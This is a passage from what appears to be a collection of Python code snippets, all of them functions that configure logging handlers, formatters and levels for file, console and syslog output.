file_handler.setFormatter(logging.Formatter(format))\n logger.addHandler(file_handler)\n\n return logger", "def setup_logger(filename):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n fh = logging.FileHandler(filename)\n fh.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n\n mac_addr = hex(uuid.getnode()).replace('0x', '')\n formatter = logging.Formatter(\n f'%(asctime)s - %(levelname)s - {mac_addr} - %(name)s: %(message)s')\n\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n logger.info('Logger is created.')", "def make_logger(name=str(os.getpid())):\n if not sys.platform.startswith(\"win\") and sys.stderr.isatty():\n def add_color_emit_ansi(fn):\n \"\"\"Add methods we need to the class.\"\"\"\n def new(*args):\n \"\"\"Method overload.\"\"\"\n if len(args) == 2:\n new_args = (args[0], copy(args[1]))\n else:\n new_args = (args[0], copy(args[1]), args[2:])\n if hasattr(args[0], 'baseFilename'):\n return fn(*args)\n levelno = new_args[1].levelno\n if levelno >= 50:\n color = '\\x1b[31;5;7m\\n ' # blinking red with black\n elif levelno >= 40:\n color = '\\x1b[31m' # red\n elif levelno >= 30:\n color = '\\x1b[33m' # yellow\n elif levelno >= 20:\n color = '\\x1b[32m' # green\n elif levelno >= 10:\n color = '\\x1b[35m' # pink\n else:\n color = '\\x1b[0m' # normal\n try:\n new_args[1].msg = color + str(new_args[1].msg) + ' \\x1b[0m'\n except Exception as reason:\n print(reason) # Do not use log here.\n return fn(*new_args)\n return new\n log.StreamHandler.emit = add_color_emit_ansi(log.StreamHandler.emit)\n log_file = os.path.join(gettempdir(), str(name).lower().strip() + \".log\")\n log.basicConfig(level=-1, filemode=\"w\", filename=log_file)\n log.getLogger().addHandler(log.StreamHandler(sys.stderr))\n adrs = \"/dev/log\" if sys.platform.startswith(\"lin\") else \"/var/run/syslog\"\n try:\n handler = log.handlers.SysLogHandler(address=adrs)\n except:\n log.debug(\"Unix SysLog Server not found, ignored Logging to SysLog.\")\n else:\n log.getLogger().addHandler(handler)\n log.debug(\"Logger created with Log file at: {0}.\".format(log_file))\n return log", "def setup_logger(logger_filename, loglevel=\"INFO\", file_loglevel=\"INFO\", name='log'):\n \n # Setup the logger\n \n \n # instanciate the logger\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n # Filehandlier\n form_File = logging.Formatter('%(asctime)s - %(module)s - %(funcName)s - %(lineno)s - %(levelname)s - '\n '%(message)s')\n fh = logging.FileHandler(logger_filename)\n #fh.setLevel(logging.DEBUG)\n\n # If SAME, use the same loglevel as VERBOSE for file_loglevel\n if file_loglevel == \"SAME\":\n file_loglevel = loglevel\n\n if not file_loglevel in [\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"SAME\"]:\n logger.error(\"Error : wrong log level : \", loglevel)\n sys.exit(1)\n if file_loglevel == \"DEBUG\":\n fh.setLevel(logging.DEBUG)\n elif file_loglevel == \"INFO\":\n fh.setLevel(logging.INFO)\n elif file_loglevel == \"WARNING\":\n fh.setLevel(logging.WARNING)\n elif file_loglevel == \"ERROR\":\n fh.setLevel(logging.ERROR)\n else:\n logger.error(\"Error : wrong log level\")\n sys.exit(1)\n fh.setFormatter(form_File)\n\n # ConsoleHandler\n ch = logging.StreamHandler()\n form_Console = logging.Formatter('%(module)s - %(message)s')\n ch.setFormatter(form_Console)\n\n # Get the log level\n if not loglevel in [\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\"]:\n logger.error(\"Error : wrong log 
level : \", loglevel)\n sys.exit(1)\n if loglevel == \"DEBUG\":\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(form_File)\n elif loglevel == \"INFO\":\n ch.setLevel(logging.INFO)\n elif loglevel == \"WARNING\":\n ch.setLevel(logging.WARNING)\n elif loglevel == \"ERROR\":\n ch.setLevel(logging.ERROR)\n else:\n logger.error(\"Error : wrong log level\")\n sys.exit(1)\n\n # Add Handlers\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n return logger", "def loggerSetup(logLevel=logging.INFO):\n logger = logging.getLogger(__name__)\n outHandler = logging.StreamHandler(sys.stdout)\n outHandler.setFormatter(logging.Formatter(\"%(asctime)s:%(levelname)s:%(module)s: %(message)s\"))\n outHandler.setLevel(logLevel)\n logger.addHandler(outHandler)\n logger.setLevel(logLevel)\n return logger", "def create_logger():\r\n global logger\r\n logger = logging.getLogger(logger_name)\r\n\r\n formatter = logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s')\r\n \r\n handler = logging.StreamHandler()\r\n handler.setFormatter(formatter)\r\n logger.addHandler(handler)\r\n \r\n return logger", "def setup_logger(logger_name, level=\"INFO\", log_file: str = None):\n assert level in LOG_LEVELS\n\n formatter = logging.Formatter('%(message)s')\n if log_file:\n handler = logging.FileHandler(log_file, mode=\"w\")\n else:\n handler = logging.StreamHandler(stdout)\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(logger_name)\n logger.setLevel(getattr(logging, level))\n logger.addHandler(handler)\n return logger", "def get_wrapping_logger(name=None, filename=None, file_size=5, debug=False):\n FORMAT = ('%(asctime)s.%(msecs)03dZ,[%(levelname)s],(%(threadName)-10s),'\n '%(module)s.%(funcName)s:%(lineno)d,%(message)s')\n log_formatter = logging.Formatter(fmt=FORMAT,\n datefmt='%Y-%m-%dT%H:%M:%S')\n log_formatter.converter = time.gmtime\n\n if name is None:\n name = get_caller_name()\n logger = logging.getLogger(name)\n\n if debug or logger.getEffectiveLevel() == logging.DEBUG:\n log_lvl = logging.DEBUG\n else:\n log_lvl = logging.INFO\n logger.setLevel(log_lvl)\n\n if filename is not None:\n # TODO: check file/path validity\n file_handler = RotatingFileHandler(filename=filename, mode='a', maxBytes=file_size * 1024 * 1024,\n backupCount=2, encoding=None, delay=0)\n file_handler.name = name + '_file_handler'\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(log_lvl)\n if not is_log_handler(logger, file_handler):\n logger.addHandler(file_handler)\n\n console_handler = logging.StreamHandler()\n console_handler.name = name + '_console_handler'\n console_handler.setFormatter(log_formatter)\n console_handler.setLevel(log_lvl)\n if not is_log_handler(logger, console_handler):\n logger.addHandler(console_handler)\n return logger", "def setupfilelogging(LogFileName):\n\n Logger = logging.getLogger(LoggerName)\n Logger.setLevel(logging.INFO)\n\n# Create a console log\n\n ConsoleLog = logging.StreamHandler()\n ConsoleLog.setLevel(logging.DEBUG)\n\n# Create a logging format and add to the logging streams\n\n formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(module)s - %(message)s')\n\n LogFormat = logging.Formatter('%(asctime)s - %(levelname)s - %(module)s - %(message)s')\n ConsoleLog.setFormatter(LogFormat)\n\n# Add the console log stream to the logger\n\n Logger.addHandler(ConsoleLog)\n\n FileLog = logging.FileHandler(LogFileName)\n FileLog.setLevel(logging.DEBUG)\n FileLog.setFormatter(LogFormat)\n\n Logger.addHandler(FileLog)\n\n return Logger", "def setup_logger(log_file: str 
= DEFAULT_LOG_FILE, level: t.Optional[int] = None):\n # create logger with 'spam_application'\n logger = logging.getLogger()\n root_log_level = level if (level is not None) else logging.DEBUG\n logger.setLevel(root_log_level)\n # create file handler which logs even debug messages\n fh = logging.FileHandler(log_file)\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n ch.setLevel(root_log_level)\n # create formatter and add it to the handlers\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n )\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch)", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file)\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def get_logger(name: str, log_path: str = os.path.join(os.path.dirname(__file__), \"main.log\"),\n console: bool = False) -> logging.Logger:\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n\n # ensure that logging handlers are not duplicated\n for handler in list(logger.handlers):\n logger.removeHandler(handler)\n\n # rotating file handler\n if log_path:\n fh = RotatingFileHandler(path_join(log_path),\n maxBytes=10 * 2 ** 20, # 10 MB\n backupCount=1) # 1 backup\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # console handler\n if console:\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n # null handler\n if not (log_path or console):\n logger.addHandler(logging.NullHandler())\n\n return logger", "def setup_custom_logger(filename):\n\n logger = logging.getLogger('root')\n logger.setLevel(logging.INFO)\n\n # set file output handler and formatter for that\n file_handler = logging.FileHandler(filename)\n file_handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\n\n # set console output handler and formatter\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(logging.Formatter('%(asctime)s - %(message)s'))\n\n logger.addHandler(console_handler)\n logger.addHandler(file_handler)\n\n return logger", "def logger_initiate():\n logger.setLevel(logging.DEBUG)\n return logging.basicConfig(\n 
format=(\n '%(asctime)s.%(msecs)03d %(name)-12s %(levelname)-8s %(message)s'),\n datefmt='%Y-%m-%d %H:%M:%S')", "def get_console_logger(name=None):\n if name is None:\n name = os.path.splitext(os.path.basename(sys.argv[0]))[0]\n logger = logging.getLogger(name)\n\n # reset handlers\n logger.handlers = []\n sh = logging.StreamHandler()\n fmt = logging.Formatter(LOG_FMT)\n sh.setFormatter(fmt)\n logger.addHandler(sh)\n logger.setLevel(logging.INFO)\n\n return logger", "def __setup_logger(name, log_file, level=logging.WARNING, stream=True):\n log_format = logging.Formatter(\"%(asctime)s%(filename)s:%(lineno)-3d %(levelname)s %(message)s\")\n handler = logging.FileHandler(log_file)\n handler.setFormatter(log_format)\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n if stream is True:\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(log_format)\n logger.addHandler(stream_handler)\n return logger", "def get_main_logger():\n\n # Use verbose debug logging for now.\n console_loglevel = VERBOSITY_LEVELS[2]\n file_loglevel = VERBOSITY_LEVELS[2]\n\n console_fmt = logging.Formatter(\n '%(name)s: %(levelname)s %(message)s')\n file_fmt = logging.Formatter(\n '%(asctime)s - %(name)s: %(levelname)s %(message)s')\n\n log = logging.getLogger('toggledarkly')\n\n console_log = logging.StreamHandler()\n console_log.setFormatter(console_fmt)\n console_log.setLevel(console_loglevel)\n log.addHandler(console_log)\n\n file_log = handlers.RotatingFileHandler(\n LOG_FILE_PATH, maxBytes=(1048576*5), backupCount=5\n )\n file_log.setFormatter(file_fmt)\n file_log.setLevel(file_loglevel)\n log.addHandler(file_log)\n\n if SYSTEMD_SUPPORT:\n journald_log = JournalHandler()\n journald_log.setLevel(file_loglevel)\n journald_log.setFormatter(console_fmt)\n log.addHandler(journald_log)\n \n log.setLevel(VERBOSITY_LEVELS[2])\n\n return log", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(logging_formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger(config):\n filename = config[\"LOGGER_FILE\"]\n log_dir = '/'.join(filename.split('/')[0:-1]) + \"/\"\n\n check_and_create_directory(log_dir)\n\n level = config[\"LOGGER_LOGLEVEL\"].upper()\n filemode = 'a'\n _format = '%(asctime)s %(name)8s %(module)15s %(funcName)12s %(' \\\n 'levelname)7s: %(message)s'\n _dateformat = '(%d.%m.%Y, %H:%M:%S)'\n\n logging.basicConfig(filename=filename, filemode=filemode, level=level,\n format=_format, datefmt=_dateformat)\n\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n logging.getLogger(\"werkzeug\").setLevel(logging.WARNING)\n\n # Display log simultaneously on console\n if config[\"CONSOLE_LOGGING\"]:\n add_terminal_logging(_format, level)", "def create_logger(args, save_dir, fname=None):\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.INFO)\n if fname is None:\n fname = 'stdout.log'\n hdlr = logging.FileHandler(os.path.join(save_dir, fname))\n hdlr.setLevel(logging.INFO)\n msg_format = '%(asctime)s [%(levelname)s] %(message)s'\n formatter = logging.Formatter(msg_format)\n ch.setFormatter(formatter)\n hdlr.setFormatter(formatter)\n root.addHandler(ch)\n root.addHandler(hdlr)\n logging.info(sys.version_info)\n logging.info(args)\n\n return logging", "def logger(name, 
debug=True):\n logging.basicConfig() # errors and everything else (2 separate log groups)\n log = logging.getLogger(name)\n log.setLevel(logging.INFO)\n if debug:\n log.setLevel(logging.DEBUG)\n return log", "def setup_logger(logger: logging.Logger, log_file_path: str) -> None:\n\n logger.setLevel(logging.DEBUG)\n\n # create handlers\n console_handler = logging.StreamHandler()\n file_handler = logging.FileHandler(log_file_path)\n\n # set levels of the handlers\n console_handler.setLevel(level=logging.DEBUG)\n file_handler.setLevel(level=logging.INFO)\n\n # create formats and set them to the handlers\n file_format = logging.Formatter('%(asctime)s | %(name)s | %(levelname)s | %(message)s')\n\n console_handler.setFormatter(CustomFormatter())\n file_handler.setFormatter(file_format)\n\n # add handlers to the logger\n logger.addHandler(console_handler)\n logger.addHandler(file_handler)", "def logger(self) -> logging.Logger:\n logging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s - %(name)-15s - [%(levelname)-10s] %(message)s\"\n )\n return logging.getLogger(os.path.basename(__file__))", "def setup_logger(name, log_file, level=logging.INFO):\n if name in ( \"\", None ):\n raise \"No name\"\n return\n\n if log_file in ( \"\", None ):\n raise \"No log_file\"\n return\n\n formatter = logging.Formatter(\n fmt = '%(asctime)s.%(msecs)03d %(levelname)s File: \"%(pathname)s\", line %(lineno)d, in %(module)s - %(funcName)s: %(message)s',\n datefmt= '%Y-%m-%d %H:%M:%S'\n )\n\n handler = logging.FileHandler(log_file)\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger():\n root = logging.getLogger()\n root.setLevel(LOGGING_LEVEL)\n formatter = logging.Formatter('%(asctime)s - %(message)s')\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(LOGGING_LEVEL)\n ch.setFormatter(formatter)\n root.addHandler(ch)", "def _create_logger(self, log_dir: str) -> logging.Logger:\n self.log_dir = log_dir\n self.log_file = os.path.join(log_dir, self.name)\n os.makedirs(self.log_dir, exist_ok=True)\n logger = logging.getLogger(self.log_file)\n logger.setLevel(logging.DEBUG)\n handler = logging.FileHandler(self.log_file)\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(filename)s:%(lineno)d %(message)s\",\n datefmt=\"%Y-%m-%d-%H:%M:%S\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger", "def logger(level, format='%(levelname)s %(message)s'):\n\n # Remove previous handlers\n root = logging.getLogger()\n if root.handlers:\n for handler in root.handlers:\n root.removeHandler(handler)\n\n # Create logger\n logger = logging.getLogger()\n logger.setLevel(getattr(logging, level.upper()))\n\n # Create console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(getattr(logging, level.upper()))\n\n # Create formatter\n formatter = Formatter(format)\n\n # Add formatter to ch\n ch.setFormatter(formatter)\n\n # Add console handler to logger\n logger.addHandler(ch)\n\n return logger", "def setLogger(options):\n loglevel = 'WARNING'\n if options.verbose:\n loglevel = logging.getLevelName(loglevel) - 10 * options.verbose\n if loglevel < 10:\n loglevel = 10\n\n logger = logging.getLogger('main')\n logger.setLevel(loglevel)\n formatter = logging.Formatter('%(asctime)s [%(levelname)s]: %(message)s')\n\n if options.logfile:\n file_logger = logging.FileHandler(options.logfile)\n else:\n file_logger = 
logging.StreamHandler()\n file_logger.setLevel(loglevel)\n file_logger.setFormatter(formatter)\n logger.addHandler(file_logger)\n\n return logger", "def setup_std_logging (logger, log_file, verbose):\n class debug_filter(logging.Filter):\n \"\"\"\n Ignore INFO messages\n \"\"\"\n def filter(self, record):\n return logging.INFO != record.levelno\n\n class NullHandler(logging.Handler):\n \"\"\"\n for when there is no logging \n \"\"\"\n def emit(self, record):\n pass\n\n # We are interesting in all messages\n logger.setLevel(logging.DEBUG)\n has_handler = False\n\n # log to file if that is specified\n if log_file:\n handler = logging.FileHandler(log_file, delay=False)\n handler.setFormatter(logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)6s - %(message)s\"))\n handler.setLevel(MESSAGE)\n logger.addHandler(handler)\n has_handler = True\n\n # log to stderr if verbose\n if verbose:\n stderrhandler = logging.StreamHandler(sys.stderr)\n stderrhandler.setFormatter(logging.Formatter(\" %(message)s\"))\n stderrhandler.setLevel(logging.DEBUG)\n if log_file:\n stderrhandler.addFilter(debug_filter())\n logger.addHandler(stderrhandler)\n has_handler = True\n\n # no logging\n if not has_handler:\n logger.addHandler(NullHandler())", "def create_logger():\n logger = logging.getLogger(\"punctuation_logger\")\n logger.setLevel(logging.INFO)\n #logger.setLevel(logging.NOTSET) # Set Logger's level to NOTSET, default is WARNING\n\n # create the logging file handler\n if options.log_file is not None:\n fh = logging.FileHandler(options.log_file)\n \n fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n formatter = logging.Formatter(fmt)\n fh.setFormatter(formatter)\n fh.setLevel(logging.NOTSET)\n # add handler to logger object\n logger.addHandler(fh)\n return logger", "def setup_logging():\n lvl = os.getenv(\"LOG_LEVEL\")\n path = os.getenv(\"LOG_PATH\")\n\n logger = get_logger()\n logger.setLevel(lvl)\n\n filehandler = logging.FileHandler(path)\n filehandler.setLevel(lvl)\n filehandler.setFormatter(logging.Formatter(\n \"[%(asctime)s] %(levelname)s: %(message)s\",\n datefmt=\"%Y-%d-%m %H:%M:%S\"\n ))\n\n streamhandler = logging.StreamHandler()\n streamhandler.setLevel(lvl)\n streamhandler.setFormatter(logging.Formatter(\"%(message)s\"))\n\n logger.addHandler(filehandler)\n logger.addHandler(streamhandler)", "def make_logger(model_dir: str, log_file: str = \"train.log\") -> Logger:\n logger = logging.getLogger(__name__)\n if not logger.handlers:\n logger.setLevel(level=logging.DEBUG)\n fh = logging.FileHandler(\"{}/{}\".format(model_dir, log_file))\n fh.setLevel(level=logging.DEBUG)\n logger.addHandler(fh)\n formatter = logging.Formatter(\"%(asctime)s %(message)s\")\n fh.setFormatter(formatter)\n if platform == \"linux\":\n sh = logging.StreamHandler()\n sh.setLevel(logging.INFO)\n sh.setFormatter(formatter)\n logging.getLogger(\"\").addHandler(sh)\n logger.info(\"Hello! 
This is Joey-NMT.\")\n return logger", "def setup_logger(log_file_path, log_name, mode=\"a\"):\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.INFO)\n\n fh = logging.FileHandler(log_file_path, mode=mode)\n fh.setLevel(logging.INFO)\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\"%(asctime)s - %(message)s\")\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch)\n logger.propagate = False # prevent the child logger from propagating log to the root logger (twice), not necessary\n return logger", "def construct_logger(name, save_dir):\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n file_no_ext = out_file_core()\n\n fh = logging.FileHandler(os.path.join(save_dir, file_no_ext + \".txt\"), encoding=\"utf-8\")\n fh.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\"%(asctime)s %(name)s %(levelname)s: %(message)s\")\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n gitdiff_patch = os.path.join(save_dir, file_no_ext + \".gitdiff.patch\")\n os.system(f\"git diff HEAD > {gitdiff_patch}\")\n\n return logger", "def create_logger():\n global logger\n\n formatter = logging.Formatter('%(asctime)s|%(levelname)s|%(message)s')\n handler = TimedRotatingFileHandler(log_file, when=\"midnight\", interval=1)\n handler.setFormatter(formatter)\n handler.setLevel(log_level)\n handler.suffix = \"%Y-%m-%d\"\n logger = logging.getLogger(\"sacplus\")\n logger.setLevel(log_level)\n logger.addHandler(handler)", "def setup_logger(logLevel=\"DEBUG\"):\n logroot = logging.getLogger(\"c\")\n logroot.propagate = False\n logroot.setLevel(logLevel)\n\n module_console_handler = logging.StreamHandler()\n\n # log_format_module = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n # log_format_module = \"%(name)s - %(levelname)s: %(message)s\"\n # log_format_module = '%(levelname)s: %(message)s'\n log_format_module = \"%(name)s: %(message)s\"\n # log_format_module = \"%(message)s\"\n\n formatter = logging.Formatter(log_format_module)\n module_console_handler.setFormatter(formatter)\n\n logroot.addHandler(module_console_handler)\n\n logging.addLevelName(5, \"TRACE\")\n # use it like this\n # logroot.log(5, 'Exceedingly verbose debug')\n\n # example log line\n logg = logging.getLogger(f\"c.{__name__}.setup_logger\")\n logg.debug(f\"Done setting up logger\")", "def log_info():\n # Get an instance of a logger\n logging.basicConfig(level=logging.DEBUG)\n return logging.getLogger('general')", "def create_logger(log_dir=None):\n if log_dir and not os.path.exists(log_dir):\n os.makedirs(log_dir)\n log_format = '%(asctime)s %(process)d [%(levelname)s] %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_format)\n logger = logging.getLogger('es_on_gke')\n if log_dir:\n log_file = os.path.join(log_dir, 'log.txt')\n file_hdl = logging.FileHandler(log_file)\n formatter = logging.Formatter(fmt=log_format)\n file_hdl.setFormatter(formatter)\n logger.addHandler(file_hdl)\n return logger", "def setup_applevel_logger(logger_name = APP_LOGGER_NAME, file_name=None):\n\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n stream_handler = logging.StreamHandler(sys.stdout)\n stream_handler.setFormatter(formatter)\n logger.handlers.clear()\n logger.addHandler(stream_handler)\n if file_name:\n if not os.path.exists(\"logs\"):\n 
os.makedirs(\"logs\")\n file_handler = logging.FileHandler(f\"./logs/{file_name}\", encoding=\"utf-8\")\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n return logger", "def _setup_logger(self, level, log_file):\n level = getattr(logging, level.upper())\n logger.setLevel(level)\n formatter = logging.Formatter(\n '[%(levelname)s] %(asctime)s - %(module)s.%(funcName)s() - %(message)s')\n handler = logging.StreamHandler()\n logger.addHandler(handler)\n handler.setFormatter(formatter)\n if not log_file:\n return\n try:\n handler = TimedRotatingFileHandler(log_file)\n except IOError:\n logger.error(\"Could not write to %s, falling back to stdout\",\n log_file)\n else:\n logger.addHandler(handler)\n handler.setFormatter(formatter)", "def debug_logging(severity, message, output=\"file\"):\n now = datetime.now()\n\n if output == \"file\":\n logging.basicConfig(filename='/home/pi/Terrarium/terrariumweb.log', level=logging.INFO)\n logging.info((\"{0}: {1} - {2}\".format(now.strftime(\"%Y-%m-%d %I:%M:%S %p\"), severity, message)))\n else:\n print((\"{0}: {1} - {2}\".format(now.strftime(\"%Y-%m-%d %I:%M:%S %p\"), severity, message)))\n return", "def init_logging(to_file=False, filename=None):\n if to_file:\n if filename is None:\n filename = timestamp() + '.log'\n logging.basicConfig(level=logging.INFO, format='%(message)s', filename=filename)\n logging.getLogger().addHandler(logging.StreamHandler(sys.stdout)) # write to stdout + file\n print('Logging to:', filename)\n else:\n logging.basicConfig(level=logging.INFO, format='%(message)s')", "def setlogger(filename):\n if debug:\n root = logging.getLogger()\n hdlr_file = logging.FileHandler(filename)\n fmt = logging.Formatter('%(name)-4s %(levelname)-7s %(message)s')\n hdlr_file.setFormatter(fmt)\n root.addHandler(hdlr_file)\n root.setLevel(logging.DEBUG)", "def setup_logging(level: int = logging.INFO) -> logging.Logger:\n log = logging.getLogger(__name__)\n console = logging.StreamHandler()\n log.addHandler(console)\n log.setLevel(level)\n return log", "def _setup_cmd_logger():\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n formatter = ColoredFormatter('%(log_color)s[%(levelname)8s] %(message)s%(reset)s')\n ch.setLevel(level=logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)", "def create_logger(logging, tool_name, level):\n logger = logging.getLogger(tool_name)\n\n # Create handlers\n handler = logging.StreamHandler()\n handler.setLevel(level)\n\n # Create formatters and add it to handlers\n logformat = logging.Formatter(\n '[%(name)s - %(asctime)s] %(levelname)s: %(message)s')\n handler.setFormatter(logformat)\n\n # Add handlers to the logger\n logger.addHandler(handler)\n logger.setLevel(level)\n\n return logger", "def __init_logging(self):\n\n logger = logging.getLogger('__name__')\n if os.path.exists(constants.LOG_FILE):\n logger.setLevel(logging.DEBUG)\n logger_file_handler = logging.FileHandler(constants.LOG_FILE)\n logger_formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s')\n logger_file_handler.setFormatter(logger_formatter)\n logger.addHandler(logger_file_handler)\n else:\n logger.disabled = True", "def _create_logger(title, log_msg_id=\"\", log_file_suffix=\".log\"):\n\n logging.setLoggerClass(SkidlLogger)\n logger = logging.getLogger(title)\n\n # Errors & warnings always appear on the terminal.\n handler = logging.StreamHandler(sys.stderr)\n handler.setLevel(logging.WARNING)\n handler.setFormatter(logging.Formatter(log_msg_id + \"%(levelname)s: %(message)s\"))\n 
logger.addHandler(handler)\n\n # Errors and warnings are stored in a log file with the top-level script's name.\n handler = SkidlLogFileHandler(get_script_name() + log_file_suffix, mode=\"w\")\n handler.setLevel(logging.WARNING)\n handler.setFormatter(logging.Formatter(log_msg_id + \"%(levelname)s: %(message)s\"))\n logger.addHandler(handler)\n\n # Set logger to trigger on info, warning, and error messages.\n logger.setLevel(logging.INFO)\n\n # Augment the logger's functions to count the number of errors and warnings.\n logger.error = CountCalls(logger.error)\n logger.warning = CountCalls(logger.warning)\n\n return logger", "def main():\n logger = setup_logger()\n\n logger.debug('a debug message')\n logger.info('an info message')\n logger.warning('a warning message')\n logger.error('an error message')\n logger.critical('a critical message')", "def SetupLogging(level=logging.WARNING, log_file_name=None):\n logging.basicConfig(\n format='%(levelname)-8s %(asctime)-8s %(message)s',\n datefmt='%H:%M:%S',\n level=level,\n **({'filename': log_file_name} if log_file_name else {}))\n logging.Formatter.converter = time.gmtime\n logging.info(time.strftime('%Y.%m.%d %Z', time.gmtime()))", "def setupLogging():\n global enabled, dummyInstance\n from pyemma.util.config import conf_values\n args = conf_values['Logging']\n\n if args.enabled:\n if args.tofile and args.file:\n filename = args.file\n else:\n filename = None\n try:\n logging.basicConfig(level=args.level,\n format=args.format,\n datefmt='%d-%m-%y %H:%M:%S',\n filename=filename,\n filemode='a')\n except IOError as ie:\n import warnings\n warnings.warn('logging could not be initialized, because of %s' % ie)\n return\n \"\"\" in case we want to log to both file and stream, add a separate handler\"\"\"\n if args.toconsole and args.tofile:\n ch = logging.StreamHandler()\n ch.setLevel(args.level)\n ch.setFormatter(logging.Formatter(args.format))\n logging.getLogger('').addHandler(ch)\n else:\n dummyInstance = dummyLogger()\n\n enabled = args.enabled", "def initialize_logger(name, add_file_handler = True):\n # Load the default logger configuration.\n logger_config = {'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '[%(asctime)s] - %(levelname)s - %(name)s >>> %(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S'}},\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'level': 'INFO',\n 'formatter': 'simple',\n 'stream': 'ext://sys.stdout'}},\n 'root': {'level': 'DEBUG',\n 'handlers': ['console']}}\n\n logging_config.dictConfig(logger_config)\n\n # Create the Logger, set its label and logging level.\n logger = logging.getLogger(name=name)\n\n # Add file handler - when the file is initialized...\n if add_file_handler:\n add_file_handler_to_logger(logger)\n\n # Set logger level depending on the settings.\n if AppState().args is not None and AppState().args.log_level is not None:\n logger.setLevel(getattr(logging, AppState().args.log_level.upper(), None))\n else:\n logger.setLevel('INFO')\n\n return logger", "def _get_logger(title, verbose_lvl):\n\n logger = logging.getLogger(title)\n console = logging.StreamHandler()\n\n if verbose_lvl == 1:\n logger.setLevel(logging.INFO)\n console.setLevel(logging.INFO)\n elif verbose_lvl == 2:\n logger.setLevel(logging.DEBUG)\n console.setLevel(logging.DEBUG)\n else:\n logger.setLevel(logging.WARNING)\n console.setLevel(logging.WARNING)\n\n fmt = logging.Formatter(\n '%(asctime)s %(name)s %(levelname)s %(message)s')\n console.setFormatter(fmt)\n 
